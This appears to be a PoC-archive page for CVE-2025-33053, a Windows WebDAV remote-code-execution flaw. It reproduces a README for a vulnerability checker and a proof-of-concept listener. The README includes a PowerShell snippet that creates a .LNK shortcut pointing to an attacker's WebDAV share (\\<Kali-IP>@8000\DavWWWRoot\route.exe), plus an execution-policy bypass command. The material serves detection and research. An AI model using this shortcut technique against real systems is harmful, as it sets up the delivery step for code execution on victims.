关联漏洞
标题:
Microsoft WebDAV 安全漏洞
(CVE-2025-33053)
描述:Microsoft WebDAV是美国微软(Microsoft)公司的一种基于HTTP协议的扩展,用于通过互联网进行文件管理和协同编辑。 Microsoft WebDAV存在安全漏洞。攻击者利用该漏洞可以执行代码。以下产品和版本受到影响:Windows 11 Version 24H2 for ARM64-based Systems,Windows 11 Version 24H2 for x64-based Systems,Windows Server 2025,Windows 10 for 32-bit
描述
CVE-2025-33053 Checker and PoC
介绍
# CVE-2025-33053 Vulnerability Checker & Proof-of-Concept (PoC)

Checker Proof

PoC Proof
A complete set of tools to check and demonstrate potential exploitation of **CVE-2025-33053**, a critical WebDAV-based Remote Code Execution (RCE) vulnerability affecting Windows systems.
---
## 📌 About CVE-2025-33053
**CVE-2025-33053** allows attackers to exploit `.LNK` shortcut files that reference malicious remote WebDAV shares, potentially leading to Remote Code Execution (RCE) on affected systems.
### Vulnerability Conditions:
- **WebClient service** must be installed and running on the target.
- The target OS must **resolve UNC paths over WebDAV** when such paths are accessed — even via `.LNK` files.
---
## 🔍 How Does the Vulnerability Work?
1. **Crafted `.LNK` File or Direct UNC Path Access** — Points to a remote UNC path like:
2. When the `.LNK` is accessed or the UNC path is manually browsed (e.g., via File Explorer): - The **WebClient service** initiates communication to the remote UNC location via WebDAV. - The system sends a **PROPFIND** request to query metadata from the attacker's server.
3. Upon receiving the PROPFIND request, the attacker can confirm that: - The target system resolves UNC paths via WebDAV. - The system is potentially vulnerable to **CVE-2025-33053**.
---
## ✅ Real-Time Vulnerability Checker (`CVE-2025-33053_checker.ps1`)
### What It Does:
| Check | Purpose |
|-------------------------------------|------------------------------------------------------------------|
| 🔍 **WebClient Service Status** | Confirms if WebDAV support is active and running. |
| 🔍 **UNC Path Handling via Test-Path**| Tests if the system resolves remote WebDAV UNC paths (key precondition for CVE exploitation). |
### How to Run:
1. **Open PowerShell as Administrator.**
2. If script execution is restricted, run:
```powershell
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
```
3. Run the checker: .\CVE-2025-33053_checker.ps1
---
## ⚙️ Proof-of-Concept (PoC) Server (CVE-2025-33053_PoC.py)
What It Does:
- Sets up a Python-based WebDAV-like server on the attacker's machine.
- Captures incoming PROPFIND requests when the victim system resolves the malicious UNC path.
- Displays in the terminal that the system reached out — proving exploitation possibility.
Note: Tested in VM.
Usage:
1. On the attacker's (Kali) machine:
```bash
python3 CVE-2025-33053_PoC.py --port 8000
```
2. On the target machine:
- Open the UNC path directly in File Explorer:
```FilePath
\\<Kali-IP>@8000\DavWWWRoot\route.exe
```
- Manually create a .LNK file in Windows or simply navigate to:
```css
\\<Kali-IP>@8000\DavWWWRoot\route.exe
```
- Example PowerShell method to create a shortcut file:
```powershell
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
```
3. If the target is vulnerable the PoC server will log:
```css
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
```
---
## 🔍 Why This PoC is Legitimate and Reliable:
✔️ Uses real UNC path resolution — no simulation.
✔️ Captures actual PROPFIND requests triggered by the OS — exact behavior required for CVE exploitation.
✔️ Demonstrates real network-level evidence of vulnerability, without executing payloads or causing harm.
---
## 🚧 Important Notes
This PoC does not exploit or harm the target system — it only detects the underlying vulnerable behavior.
Intended for use in controlled environments or with explicit authorization.
Demonstrates real system behavior — not a mock simulation.
**To be used for educational purposes only. Do not run in unauthorised systems.**
---
## 🏷️ License
MIT License — Free for educational, research, and defensive purposes only.
---
## 🤝 Contributing
Pull Requests welcome — improve detection, add features, or suggest fixes.
---
## ⚠️ Disclaimer
This repository is **for educational and authorized security research only.**
Misuse against systems you do not own or have permission to test is strictly forbidden.
文件快照
[4.0K] /data/pocs/e7e6ff4ba494a937c5ccdd3c8bbb5f8b193e8b96
├── [1.0K] CVE-2025-33053_checker.ps1
├── [1.6K] CVE-2025-33053_PoC.py
├── [ 90K] image.png
├── [1.0K] LICENSE
├── [4.0K] misc
│ ├── [ 60K] Checker_Proof.png
│ └── [ 62K] PoC_proof.png
└── [4.4K] README.md
1 directory, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。